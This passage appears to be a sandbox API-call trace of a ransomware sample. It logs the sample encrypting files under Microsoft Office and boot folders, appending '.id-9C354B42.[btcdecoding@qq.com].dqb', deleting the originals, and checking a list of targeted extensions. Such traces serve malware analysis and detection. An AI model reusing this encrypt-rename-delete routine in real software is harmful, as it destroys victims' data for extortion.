lpNumberOfBytesWritten=0x338fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.832] SetEndOfFile (hFile=0x2d4) returned 1 [0274.834] CloseHandle (hObject=0x2d4) returned 1 [0274.835] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.835] SetEndOfFile (hFile=0x31c) returned 1 [0274.854] CloseHandle (hObject=0x31c) returned 1 [0274.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0274.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.867] lstrlenW (lpString=".doc") returned 4 [0274.867] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.867] lstrlenW (lpString=".docx") returned 5 [0274.867] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.867] lstrlenW (lpString=".pdf") returned 4 [0274.867] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.867] lstrlenW (lpString=".xls") returned 4 [0274.867] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.867] lstrlenW (lpString=".xlsx") returned 5 [0274.867] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.867] lstrlenW (lpString=".ppt") returned 4 [0274.867] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString=".zip") returned 4 [0274.868] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.868] lstrlenW (lpString=".rar") returned 4 [0274.868] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.868] lstrlenW (lpString=".bz2") returned 4 [0274.868] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.868] lstrlenW (lpString=".7z") returned 3 [0274.868] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString=".dbf") returned 4 [0274.868] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString=".1cd") returned 4 [0274.868] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString=".jpg") returned 4 [0274.868] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.868] lstrlenW (lpString=".doc") returned 4 [0274.868] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.868] lstrlenW (lpString=".docx") returned 5 [0274.868] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.868] lstrlenW (lpString=".pdf") returned 4 [0274.868] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.868] lstrlenW (lpString=".xls") returned 4 [0274.868] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.868] lstrlenW (lpString=".xlsx") returned 5 [0274.869] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.869] lstrlenW (lpString=".ppt") returned 4 [0274.869] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.869] lstrlenW (lpString=".zip") returned 4 [0274.869] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.869] lstrlenW (lpString=".rar") returned 4 [0274.869] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.869] lstrlenW (lpString=".bz2") returned 4 [0274.869] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.869] lstrlenW (lpString=".7z") returned 3 [0274.869] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.869] lstrlenW (lpString=".dbf") returned 4 [0274.869] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.869] lstrlenW (lpString=".1cd") returned 4 [0274.869] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63 [0274.869] lstrlenW (lpString=".jpg") returned 4 [0274.869] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.869] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.869] lstrlenW (lpString="JAVA_01.MID") returned 11 [0274.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.870] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=9797) returned 1 [0274.870] CloseHandle (hObject=0x310) returned 1 [0274.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 0x20 [0274.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.870] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.870] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0274.870] GetLastError () returned 0x0 [0274.871] ReadFile (in: hFile=0x310, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x2645, lpOverlapped=0x0) returned 1 [0274.872] WriteFile (in: hFile=0x32c, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesWritten=0x338fc9c*=0x2650, lpOverlapped=0x0) returned 1 [0274.873] ReadFile (in: hFile=0x310, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.873] WriteFile (in: hFile=0x32c, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesWritten=0x338fc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.873] SetEndOfFile (hFile=0x32c) returned 1 [0274.873] CloseHandle (hObject=0x32c) returned 1 [0274.873] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.873] SetEndOfFile (hFile=0x310) returned 1 [0274.876] CloseHandle (hObject=0x310) returned 1 [0274.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid")) returned 1 [0274.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.876] lstrlenW (lpString=".doc") returned 4 [0274.876] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.876] lstrlenW (lpString=".docx") returned 5 [0274.876] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.876] lstrlenW (lpString=".pdf") returned 4 [0274.876] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.877] lstrlenW (lpString=".xls") returned 4 [0274.877] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.877] lstrlenW (lpString=".xlsx") returned 5 [0274.877] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.877] lstrlenW (lpString=".ppt") returned 4 [0274.877] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.877] lstrlenW (lpString=".zip") returned 4 [0274.877] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.877] lstrlenW (lpString=".rar") returned 4 [0274.877] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.877] lstrlenW (lpString=".bz2") returned 4 [0274.877] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.877] lstrlenW (lpString=".7z") returned 3 [0274.877] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.877] lstrlenW (lpString=".dbf") returned 4 [0274.877] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.877] lstrlenW (lpString=".1cd") returned 4 [0274.877] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.878] lstrlenW (lpString=".jpg") returned 4 [0274.878] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.878] lstrlenW (lpString=".doc") returned 4 [0274.878] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.878] lstrlenW (lpString=".docx") returned 5 [0274.878] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.878] lstrlenW (lpString=".pdf") returned 4 [0274.878] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.878] lstrlenW (lpString=".xls") returned 4 [0274.878] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.878] lstrlenW (lpString=".xlsx") returned 5 [0274.878] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.878] lstrlenW (lpString=".ppt") returned 4 [0274.878] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.878] lstrlenW (lpString=".zip") returned 4 [0274.878] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.878] lstrlenW (lpString=".rar") returned 4 [0274.878] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.878] lstrlenW (lpString=".bz2") returned 4 [0274.878] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.878] lstrlenW (lpString=".7z") returned 3 [0274.878] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.878] lstrlenW (lpString=".dbf") returned 4 [0274.879] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.879] lstrlenW (lpString=".1cd") returned 4 [0274.879] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 62 [0274.879] lstrlenW (lpString=".jpg") returned 4 [0274.879] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.879] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.879] lstrlenW (lpString="JNGLE_01.MID") returned 12 [0274.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.879] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=5843) returned 1 [0274.879] CloseHandle (hObject=0x310) returned 1 [0274.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 0x20 [0274.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.881] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.881] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0274.882] GetLastError () returned 0x0 [0274.882] ReadFile (in: hFile=0x310, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x16d3, lpOverlapped=0x0) returned 1 [0274.953] WriteFile (hFile=0x32c, lpBuffer=0x3e30020, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0) Thread: id = 100 os_tid = 0x680 [0268.870] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3aa0098 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3ab00a0 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c88 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661a10 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ca0 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3f40020 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c40 [0268.871] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c40, Size=0x20) returned 0x65b828 [0268.871] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c40 [0268.871] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c40, Size=0x20) returned 0x65b800 [0268.871] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.872] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.872] Wow64DisableWow64FsRedirection (in: OldValue=0x34cff58 | out: OldValue=0x34cff58*=0x0) returned 1 [0268.872] lstrlenW (lpString="kernel32.dll") returned 12 [0268.872] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.872] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.872] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.872] Sleep (dwMilliseconds=0x64) [0269.213] lstrcmpiW (lpString1=".LOG2", lpString2=".dqb") returned 1 [0269.213] lstrlenW (lpString="BCD.LOG2") returned 8 [0269.213] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.275] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=0) returned 1 [0269.275] CloseHandle (hObject=0x1f0) returned 1 [0269.275] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.275] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.275] lstrlenW (lpString=".doc") returned 4 [0269.275] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0269.275] lstrlenW (lpString=".docx") returned 5 [0269.275] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0269.275] lstrlenW (lpString=".pdf") returned 4 [0269.275] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".xls") returned 4 [0269.276] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".xlsx") returned 5 [0269.276] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0269.276] lstrlenW (lpString=".ppt") returned 4 [0269.276] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString=".zip") returned 4 [0269.276] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".rar") returned 4 [0269.276] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".bz2") returned 4 [0269.276] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".7z") returned 3 [0269.276] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString=".dbf") returned 4 [0269.276] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString=".1cd") returned 4 [0269.276] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString=".jpg") returned 4 [0269.276] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.276] lstrlenW (lpString=".doc") returned 4 [0269.276] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0269.276] lstrlenW (lpString=".docx") returned 5 [0269.276] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0269.276] lstrlenW (lpString=".pdf") returned 4 [0269.277] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString=".xls") returned 4 [0269.277] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString=".xlsx") returned 5 [0269.277] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0269.277] lstrlenW (lpString=".ppt") returned 4 [0269.277] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.277] lstrlenW (lpString=".zip") returned 4 [0269.277] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString=".rar") returned 4 [0269.277] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString=".bz2") returned 4 [0269.277] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString=".7z") returned 3 [0269.277] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0269.277] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.277] lstrlenW (lpString=".dbf") returned 4 [0269.277] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.277] lstrlenW (lpString=".1cd") returned 4 [0269.277] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0269.277] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0269.277] lstrlenW (lpString=".jpg") returned 4 [0269.277] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0269.277] lstrcmpiW (lpString1=".ttf", lpString2=".dqb") returned 1 [0269.277] lstrlenW (lpString="kor_boot.ttf") returned 12 [0269.277] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.282] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=2371360) returned 1 [0269.282] CloseHandle (hObject=0x1f0) returned 1 [0269.282] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0269.282] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.282] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.282] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.282] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.282] lstrlenW (lpString=".doc") returned 4 [0269.282] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString=".docx") returned 5 [0269.283] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.283] lstrlenW (lpString=".pdf") returned 4 [0269.283] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString=".xls") returned 4 [0269.283] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.283] lstrlenW (lpString=".xlsx") returned 5 [0269.283] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.283] lstrlenW (lpString=".ppt") returned 4 [0269.283] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString=".zip") returned 4 [0269.283] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.283] lstrlenW (lpString=".rar") returned 4 [0269.283] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString=".bz2") returned 4 [0269.283] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString=".7z") returned 3 [0269.283] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString=".dbf") returned 4 [0269.283] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString=".1cd") returned 4 [0269.283] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString=".jpg") returned 4 [0269.283] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0269.283] lstrlenW (lpString=".doc") returned 4 [0269.283] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.283] lstrlenW (lpString=".docx") returned 5 [0269.284] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.284] lstrlenW (lpString=".pdf") returned 4 [0269.284] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 